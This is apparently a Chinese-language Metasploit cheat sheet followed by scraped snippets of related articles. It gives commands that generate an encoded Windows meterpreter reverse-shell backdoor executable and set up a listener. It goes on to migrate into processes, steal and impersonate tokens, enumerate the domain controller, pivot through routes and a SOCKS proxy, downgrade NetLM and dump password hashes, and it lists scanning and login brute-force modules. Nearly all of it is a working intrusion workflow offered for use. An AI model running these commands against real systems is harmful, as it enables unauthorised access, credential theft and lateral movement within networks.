metasploit使用模块

反弹的shell,这里介绍两种payload:
Windows/meterpreter/reverse_tcp
Windows/meterpreter/reverse_https  windows/meterpreter/reverse_http
生成反弹后门:
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=443 R | \msfencode –b ‘’ -t exe -o root/Desktop/sx.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=202.96.1.135 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe >  /root/Share/msf.exe
设置监听:
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 183.11.80.233
msf  exploit(handler) > set LPORT 443
msf  exploit(handler) > exploit
迁移到稳定进程:
ps    //查看主机进程PID
migrate PID   //迁移到指定的进程ID
假冒主机已登录用户:
use incognito         //加载incognito功能(用来盗窃目标主机的令牌或假冒用户)
list_tokens -u          //列出目标主机用户的可用令牌
list_tokens -g          //列出目标主机用户组的可用令牌
impersonate_token DOMAIN_NAME\\USERNAME       //假冒目标主机上的可用令牌
steal_token PID      //盗窃给定进程的可用令牌并进行令牌假冒
drop_token             //冒当前令牌

查看网段:
ifconfig
查看域控:
meterpreter > run post/windows/gather/enum_domain
[+] FOUND Domain: dis9 (域)
[+] FOUND Domain Controller: dis9team-Domain (IP: 1.1.1.10) (域控IP)
查看网络接口:

meterpreter > route
meterpreter > run get_local_subnets
(meterpreter > background 后台运行SESSION)
添加路由至本地:
msf  exploit(handler) > route add 192.168.15.0 255.255.255.0 1 (1为SESSION ID)
msf  exploit(handler) > route print (列出路由)
开SOCKS代理:
msf  exploit(handler) > use auxiliary/server/socks4a
msf  auxiliary(socks4a) > exploit
使用Proxychains连接代理:
编辑proxychains.conf:sudo gedit /etc/proxychains.conf
连接代理:proxychains nc -vv 192.168.15.100 445
代理使用NMAP:
proxychains nmap -sT -Pn 192.168.1.108
在这里便可以看到nmap已经正常运行了. 在这里如果不加-sT 参数 或者是用 其他扫描方式便会出错 比如-sS etc.话说这个问题困扰了我很长时间,google了一番之后发现

Proxychains allows TCPand DNS tunneling through proxies. Be aware that Proxychains only tunnels TCPand DNS; in other words, avoid using UDP and host discovering through ICMP(ping).
在这里运行nmap之前可以先扫扫c段中的tcp空连接,然后就可以使用nmap进行tcp空链接扫描.这样便可以进行伪装工作,模块是这个.(具体用法请show options 或info)
auxiliary/scanner/ip/ipidseq
然后nmap中使用 -sI 参数选择空闲主机
nmap -sT -Pn -A -sI 192.168.1.101 192.168.1.108
-sT tcp扫描,-Pn 不进行ping,-A 显示更详细的信息.-sI 指定空闲主机
//////////////////////////////////////////////////////////////
获取HASH模块:
use ost/windows/manage/netlm_downgrade (多用户可用incognito切换用户来获取不同用户的HASH)
msf post(netlm_downgrade)  >  set session 1
msf post(netlm_downgrade)  >  set SMBHOST 192.168.1.2
msf post(netlm_downgrade)  >  run
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
use post/windows/gather/hashdump(可获取全部用户hash)
msf post(hashdump)  >  set SESSION 1
msf post(hashdump)  >  exploit
msf post(hashdump)  >  creds(查看保存在数据库里面的hash)
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
metaspliot常见探测服务模块:

端口扫描
auxiliary/scanner/portscan
scanner/portscan/ack        ACK防火墙扫描
scanner/portscan/ftpbounce  FTP跳端口扫描
scanner/portscan/syn        SYN端口扫描
scanner/portscan/tcp        TCP端口扫描
scanner/portscan/xmas       TCP"XMas"端口扫描
smb扫描
smb枚举auxiliary/scanner/smb/smb_enumusers
返回DCERPC信息auxiliary/scanner/smb/pipe_dcerpc_auditor
扫描SMB2协议auxiliary/scanner/smb/smb2
扫描smb共享文件auxiliary/scanner/smb/smb_enumshares
枚举系统上的用户auxiliary/scanner/smb/smb_enumusers
SMB登录auxiliary/scanner/smb/smb_login
SMB登录use windows/smb/psexec
扫描组的用户auxiliary/scanner/smb/smb_lookupsid
扫描系统版本auxiliary/scanner/smb/smb_version
mssql扫描(端口tcp1433udp1434)
admin/mssql/mssql_enum     MSSQL枚举
admin/mssql/mssql_exec     MSSQL执行命令
admin/mssql/mssql_sql      MSSQL查询
scanner/mssql/mssql_login  MSSQL登陆工具
scanner/mssql/mssql_ping   测试MSSQL的存在和信息
另外还有一个mssql_payload的模块 利用使用的
smtp扫描
smtp枚举auxiliary/scanner/smtp/smtp_enum
扫描smtp版本auxiliary/scanner/smtp/smtp_version
snmp扫描
通过snmp扫描设备auxiliary/scanner/snmp/community
ssh扫描
ssh登录auxiliary/scanner/ssh/ssh_login
ssh公共密钥认证登录auxiliary/scanner/ssh/ssh_login_pubkey
扫描ssh版本测试auxiliary/scanner/ssh/ssh_version
telnet扫描
telnet登录auxiliary/scanner/telnet/telnet_login
扫描telnet版本auxiliary/scanner/telnet/telnet_version
tftp扫描
扫描tftp的文件auxiliary/scanner/tftp/tftpbrute
ftp版本扫描scanner/ftp/anonymous
ARP扫描
auxiliary/scanner/discovery/arp_sweep
扫描UDP服务的主机auxiliary/scanner/discovery/udp_probe
检测常用的UDP服务auxiliary/scanner/discovery/udp_sweep
sniffer密码auxiliary/sniffer/psnuffle
snmp扫描scanner/snmp/community
vnc扫描无认证扫描scanner/vnc/vnc_none_auth
时间: 2024-10-03 08:24:07

metasploit使用模块的相关文章

Metasploit辅助模块

msf > show auxiliary Auxiliary ========= Name                                                  Disclosure Date  Rank       Description ----                                                  ---------------  ----       ----------- admin/2wire/xslt_pass

玩转Metasploit系列(第一集)

“如果我有七个小时的时间来砍树,那么我一定会花6个小时来磨我的斧头.”               –Abraham Lincoln ‍‍这句话一直引导着我做事的思路,而且从未改变过.这篇文章翻译自Offensive-security社区.我希望通过我的翻译能够让国内的安全人员能够有进一步的升华.当然,在翻译的时候我也加上了我自己的想法和一些注释.在我做渗透测试或者审计测试之前,我一般都会对我的Metasploit上面的工具和脚本进行升级和完善.中国有句俗话,养兵千日,用兵一时.我对Metasp

Armitage --> Metasploit图形界面化的攻击

攻击环境 : 靶机 : metasploitable  ip 192.168.162.129 攻击机  kali2017        ip 192.168.162.128 网络桥接 我之前直接打开的时候就没有启动起来   结果一顿百度  说是要重启一下服务networking服务  和重置一下msfdb 也就是这个命令 service networking restart msfdb init 然后再执行以下操作 这样就启动肯定还是有问题的  但是能打开能用  就先这样吧  以后再解决 打开k

Metasploit 渗透测试魔鬼训练营读书笔记(连续更新一)

1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防战术与作战能力.在信息科技的发源地--美国的军事演习中,将美军称为"蓝军",将假想敌称为"红军",而这种军事演习的方式也在20世纪90年代时,由美国军方与国家安全局引入到对信息网络与信息安全基础设施的实际攻防测试过程中.由一群受过职业训练的安全专家作为"红队"(Red Team),对接受测试的防御方"蓝队

揭秘VxWorks——直击物联网安全罩门

转载:http://chuansong.me/n/1864339 VxWorks是美国风河(WindRiver)公司于1983年设计开发的一种嵌入式实时操作系统(RTOS),是嵌入式开发环境的关键组成部分.良好的持续发展能力.高性能的内核以及友好的用户开发环境,在嵌入式实时操作系统领域占据一席之地. VxWorks支持几乎所有现代市场上的嵌入式CPU,包括x86系列.MIPS. PowerPC.Freescale ColdFire.Intel i960.SPARC.SH-4.ARM,Strong

WEB渗透测试培训班

2018最新WEB渗透测试培训班 介绍: 2012-2018这几年我们迎来大数据时代.网络环境.现在更加普及和大众化!我们不仅在生活上,工作上都正受到前所未有的挑战. 这些挑战包括:隐私泄漏.信息泄露.黑客攻击.商业间谍等.除了加强信息安全教育外,我们还要从技术上解决这类安全问题. 随着区块链思想的产生,这几年将是网络发展突破瓶颈的过渡区,所以Yuntest特意隆重推出关于网络安全方面的课程WEB安全渗透. 面向人群:WEB安全.程序员.系统运维.SEO黑白帽.群众 培训形式:多种课程为您量身定

实验报告 四(未完待续)

中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验四 恶意代码技术     学生姓名 宋欣雨 年级 2015 区队 二 指导教师 高见     信息技术与网络安全学院 2016年11月7日   实验任务总纲 2016-2017 学年 第 一 学期 一.实验目的 1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制:通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范

20179301 段晓庆 《网络攻防》第六周总结

a.教材<网络攻防技术>第五.六章的学习 第五章主要介绍了TCP/IP网络协议攻击,通过分别介绍分层模型中的每一层存在的安全缺陷,引出了每一层不同的攻击实现方法和解决对策.分别介绍了IP源地址欺骗.ARP欺骗.ICMP路由重定向.TCP RST攻击.TCP会话劫持攻击.TCP SYN Flood拒绝服务攻击和UDP Flood拒绝服务攻击的技术原理.具体过程和防范措施.应对这些网络协议攻击威胁,TCP/IP协议也正在进行着完善和改进,对于防御者而言,应充分采用最新的安全协议来武装自己的网络,从

2017-2018-2 20179215《网络攻防实践》第六周作业

2017-2018-2 20179215<网络攻防实践> 第六周学习总结 课本学习笔记 一.TCP/IP网络协议攻击 1.网络安全的属性:机密性 .完整性 .可用性 .真实性 .不可抵赖性 . 2.网络攻击的基本模式分为:截获(嗅探 与 监听) .中断(拒绝服务) .篡改(数据包篡改) .伪造(欺骗) . 3.TCP/IP网络协议栈在设计时采用了分层模型,分为:网络接口层 .互联层 .传输层 .应用层.每一层当中都有针对破坏网络安全属性为目的的攻击技术.每一层所涉及的主要协议: 网络接口层:以